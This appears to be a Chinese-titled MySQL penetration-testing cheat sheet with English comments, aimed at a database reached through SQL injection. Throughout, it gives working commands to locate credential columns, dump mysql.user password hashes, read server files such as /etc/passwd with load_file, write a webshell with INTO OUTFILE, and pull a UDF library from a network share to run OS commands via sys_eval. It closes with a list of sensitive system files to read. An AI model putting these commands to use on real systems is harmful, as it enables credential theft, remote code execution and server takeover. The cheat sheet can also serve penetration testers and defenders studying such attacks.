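# -- Find columns that look like they hold credentials --
# table_schema is included so a hit can be resolved unambiguously when several
# databases have a table of the same name. INFORMATION_SCHEMA string columns
# normally use a case-insensitive collation, so 'Password' / 'PWD' match as well.
# '%pass%' is a superset of the original '%passw%' and also catches e.g.
# 'passcode' / 'passphrase'; tighten it if the result set is too noisy.
select table_schema, table_name, column_name
from INFORMATION_SCHEMA.COLUMNS
where column_name like '%pwd%' or column_name like '%pass%';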
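# -- Find tables whose NAME matches a pattern --
# (The original comment said "content"; this only searches table names, not rows.)
# Replace 'dbname' with the target schema, or use table_schema = database() for the
# schema the injection point is connected to. table_type distinguishes BASE TABLE from VIEW.
SELECT table_schema, table_name, table_type
FROM information_schema.tables
WHERE table_schema = 'dbname' AND table_name LIKE '%use%';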
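# -- Server environment checks to run BEFORE attempting file reads/writes or a UDF --
# plugin_dir: from MySQL 5.0.67 onward the UDF shared library must be located in this
# directory (CREATE FUNCTION ... SONAME resolves relative to it). If plugin_dir is empty
# the pre-5.0.67 behaviour applies and the dynamic linker's normal search path is used.
select @@plugin_dir;
select @@version;
# OS and architecture the server binary was built for: the UDF library must match both
# (e.g. the *_64.dll used further down only loads into a 64-bit Windows mysqld).
select @@version_compile_os, @@version_compile_machine;
# secure_file_priv gates load_file() / INTO OUTFILE / INTO DUMPFILE:
#   NULL  -> file import/export disabled entirely
#   ''    -> unrestricted
#   path  -> only files under that directory can be read or written
# 5.7.6+ typically ships with a restrictive default, so check this before anything below.
select @@secure_file_priv;
select @@datadir;
select @@tmpdir;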
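# -- Reading files from the server's filesystem --
# load_file() needs the FILE privilege, a non-NULL @@secure_file_priv (and, if it is a
# path, the file must be under it), and the file must be readable by the OS account mysqld
# runs as and smaller than @@max_allowed_packet. On any failure it returns NULL silently
# rather than raising an error, so a NULL result does not prove the file is absent.
select load_file('/etc/passwd');
# length() counts bytes; when paging through a file with substring() (which counts
# characters) use char_length() instead, or the two will disagree on multibyte content.
select length(load_file('/var/www/html/index.php'));
# A list of files worth reading is attached at the end of this page.
# Some injection channels (boolean/time-based) extract very slowly, so locate the
# interesting part first instead of pulling the whole file.
# INSTR() returns the 1-based position of the needle, or 0 if it is not found.
select INSTR(load_file('/etc/httpd/conf/httpd.conf'),'xxx.com');
# Read the 20 characters following the 3rd occurrence of 'DocumentRoot'.
# (fix: the original statement was terminated with ':' instead of ';')
select substring(substring_index(substring_index(load_file('/etc/httpd/conf/httpd.conf'),'DocumentRoot',3),'DocumentRoot',-1),1,20);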
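# -- MySQL account password hashes and the privileges that matter here --
# Needs SELECT on mysql.user (normally root-level access). File_priv is included because
# load_file() / INTO OUTFILE / INTO DUMPFILE below all require the FILE privilege.
# MySQL <= 5.6 (MariaDB still exposes it too): the hash is in the `password` column.
SELECT host, user, password, Grant_priv, Super_priv, File_priv FROM mysql.user;
# MySQL >= 5.7 (e.g. the 5.7.21 target used further down) dropped `password`; the query
# above fails with "Unknown column 'password'". The hash is in `authentication_string`
# and `plugin` tells you which hash format it is (needed to pick the right cracking mode).
SELECT host, user, authentication_string, plugin, Grant_priv, Super_priv, File_priv FROM mysql.user;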
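# -- What other sessions are doing (equivalent to SHOW FULL PROCESSLIST) --
# Without the PROCESS privilege you only see your own threads. INFO holds the statement
# currently executing, which may contain secrets in clear text (passwords in
# CREATE USER / SET PASSWORD, application queries). Explicit columns instead of SELECT *.
# (MySQL 8.0.22+ also offers performance_schema.processlist with the same information.)
SELECT ID, USER, HOST, DB, COMMAND, TIME, STATE, INFO FROM INFORMATION_SCHEMA.PROCESSLIST;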
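# -- Writing files on the server --
# All three statements need the FILE privilege and @@secure_file_priv equal to '' or to a
# directory that contains the target path. The target file must not already exist (MySQL
# refuses to overwrite), and the directory must be writable by the OS account mysqld runs
# as; the file is then owned by that account, so whatever has to consume it afterwards
# (the web server, the plugin loader) must be able to read it.
#
# Example 1: fetch the UDF library over SMB and drop it into plugin_dir. The SMB fetch is
# performed by mysqld on the DB host, not by your client, so the share must be reachable
# from there, and the connection is made with the identity of the account mysqld runs as
# (and will appear in the share's logs). The destination must equal @@plugin_dir (see
# above); the doubled backslashes are MySQL string escaping.
select load_file('\\\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll') into dumpfile "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";
# Example 2: write the library from an inline hex literal (0x followed by an EVEN number of
# hex digits covering the whole file; statement size is bounded by @@max_allowed_packet).
# INTO DUMPFILE writes the value byte-for-byte with no escaping and no line terminator,
# which is what a binary needs; INTO OUTFILE would mangle it.
select 0x4d5a900003000xxxxx into dumpfile 'xxx.dll';
# Example 3: drop a text file (e.g. a webshell under the web root).
# fix: `into file` is not valid MySQL syntax. Use INTO OUTFILE (applies escaping and
# appends a newline, fine for text) or INTO DUMPFILE (raw bytes).
select 'xxxx' into outfile 'xx.php';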
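# -- Registering and using the UDF (lib_mysqludf_sys) --
# CREATE FUNCTION needs INSERT on mysql.func (effectively root). The library must sit in
# @@plugin_dir (see above) and match the server's OS and architecture (.dll on Windows,
# .so on Linux; 32- vs 64-bit). The function name must match a symbol exported by the
# library: sys_eval returns the command's output, sys_exec only its exit code.
# fix: `//` is not a MySQL comment delimiter, so the original lines were syntax errors;
# and DROP FUNCTION came before the sys_eval() call, which would then fail.
create function sys_eval returns string soname 'udf.dll';   # register the UDF
select name, ret, dl, type from mysql.func where name = 'sys_eval';   # verify the registration
# The command runs on the DB host under the OS account mysqld runs as (SYSTEM/root if the
# service was installed carelessly); its stdout is returned as the result.
select sys_eval('dir');
# Clean-up: the registration persists in mysql.func across restarts, so drop it when done.
# DROP FUNCTION does not delete the library file from plugin_dir; remove that yourself.
drop function sys_eval;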
/etc/issue 系统版本
/etc/sysconfig/network-scripts/ifcfg-eth0 可能有ip
/etc/passwd 本地账号列表（用户名、uid、shell、家目录），现代系统中不含口令hash；口令hash在 /etc/shadow 中，该文件通常仅 root 可读，mysqld 运行账号一般无法通过 load_file 读取
/etc/sysconfig/iptables 防火墙规则
/etc/httpd/conf/httpd.conf http配置（RHEL/CentOS 路径；Debian/Ubuntu 为 /etc/apache2/apache2.conf 及 /etc/apache2/sites-enabled/ 下的站点文件）
/etc/crontab 计划任务
渗透中用到的sql语句-mysql篇